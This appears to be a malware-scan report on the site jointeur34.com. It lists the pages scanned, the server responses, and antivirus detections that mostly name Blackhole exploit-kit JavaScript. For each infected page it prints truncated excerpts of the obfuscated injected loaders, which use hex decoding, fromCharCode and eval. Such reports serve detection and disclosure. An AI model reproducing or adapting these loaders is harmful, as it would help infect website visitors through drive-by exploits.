Request | Server response | Status |
http://jointeur34.com/ | 200 OK Content-Length: 18448 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:62:59:6d:5f:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:62:59:6d:5f:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b: ...[4041 bytes skipped]... Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BDD [Trj]
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.CZ
- Comodo
- TrojWare.JS.Kryptik.acc
- Emsisoft
- JS:Exploit.BlackHole.CZ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- Exploit.BlackHole.196
- Kaspersky
- Exploit.JS.Pdfka.gkj
- Microsoft
- Trojan:JS/BlacoleRef.DD
- MicroWorld-eScan
- JS:Exploit.BlackHole.BD
- Fortinet
- JS/Kryptik.AOG!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.CZ
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.CZ
- ESET-NOD32
- JS/Kryptik.AOG
|
http://jointeur34.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 13020 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album1/index.php | 200 OK Content-Length: 6660 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0','width','750','height','450','src','banniere','quality','best','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','09?hidemenu=&gallerie=&ac_reference= <script type="text/javascript" language="javascript" > if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,70,6b,74,74,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,6
... 3869 bytes are skipped ...70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,70,6b,74,74,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.50
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.AY
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.AY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- Comodo
- TrojWare.JS.Agent.JP
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.AY
- VIPRE
- Trojan.JS.Obfuscator.aa (v)
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
- BitDefender
- JS:Exploit.BlackHole.AY
|
http://jointeur34.com/album1/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8224 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album1/Scripts/AC_ActiveX.js | 200 OK Content-Length: 7048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
http://jointeur34.com/album2/index.php | 200 OK Content-Length: 6660 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0','width','750','height','450','src','banniere','quality','best','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','09?hidemenu=&gallerie=&ac_reference= <script type="text/javascript" language="javascript" > if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,70,6b,74,74,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,6
... 3869 bytes are skipped ...70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,70,6b,74,74,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.50
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.AY
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.AY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- Comodo
- TrojWare.JS.Agent.JP
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.AY
- VIPRE
- Trojan.JS.Obfuscator.aa (v)
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
- BitDefender
- JS:Exploit.BlackHole.AY
|
http://jointeur34.com/album2/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8224 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album2/Scripts/AC_ActiveX.js | 200 OK Content-Length: 7048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album3/index.php | 200 OK Content-Length: 6660 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0','width','750','height','450','src','banniere','quality','best','pluginspage','http://www.macromedia.com/go/getflashplayer','movie','09?hidemenu=&gallerie=&ac_reference= <script type="text/javascript" language="javascript" > if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,70,6b,74,74,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,6
... 3869 bytes are skipped ...70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,70,6b,74,74,37,40,2f,30,42,14,11,84,14,11,84".split(","));r=eval;function vqvq(){zva=function(){--(d.body)}()}d=document;for(i=0;i<a.length;i+=1){a[i]=-(12-5)+parseInt(a[i],zq*4);}try{vqvq()}catch(q){yy=50-50;}try{yy/=123}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCh"+"arCo"+"de"].apply(String,a));Antivirus reports:- AntiVir
- JS/Blacole.EB.50
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.AY
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.AY
- TrendMicro-HouseCall
- TROJ_GEN.F47V1203
- Emsisoft
- JS:Exploit.BlackHole.AY (B)
- Comodo
- TrojWare.JS.Agent.JP
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.498
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.AY
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.AY
- VIPRE
- Trojan.JS.Obfuscator.aa (v)
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.AY
- BitDefender
- JS:Exploit.BlackHole.AY
|
http://jointeur34.com/album3/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8224 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://jointeur34.com/album3/Scripts/AC_ActiveX.js | 200 OK Content-Length: 7048 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[vz].body)==null}()}catch(q){aa=function(ff){ff="fr"+"omCh"+ff;for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{++e(vz)["\x62o"+"d"+z]}catch(q){a2="^";}z="2d^73^82^7b^70^81^76^7c^7b^2d^73^7a^78^3d^46^35^36^2d^88^1a^17^2d^83^6e^7f^2d^80^81^6e^81^76^70^4a^34^6e^77^6e^85^34^48^1a^17^2d^83^6e^7f^2d^70^7c^7b^81^7f^7c^79^79^72^7f^4a^34^76^7b^71^72^85^3b^7d^
... 3569 bytes are skipped ...^7f^76^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^73^7a^78^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e(""+za);}Antivirus reports:- AntiVir
- JS/Blacole.EH.1
- Avast
- JS:Decode-BFW [Trj]
- nProtect
- JS:Exploit.BlackHole.BN
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- Comodo
- TrojWare.JS.iFrame.D
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- DrWeb
- JS.IFrame.500
- Kaspersky
- Trojan-Downloader.JS.Expack.ajr
- Microsoft
- Exploit:JS/Blacole.OC
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|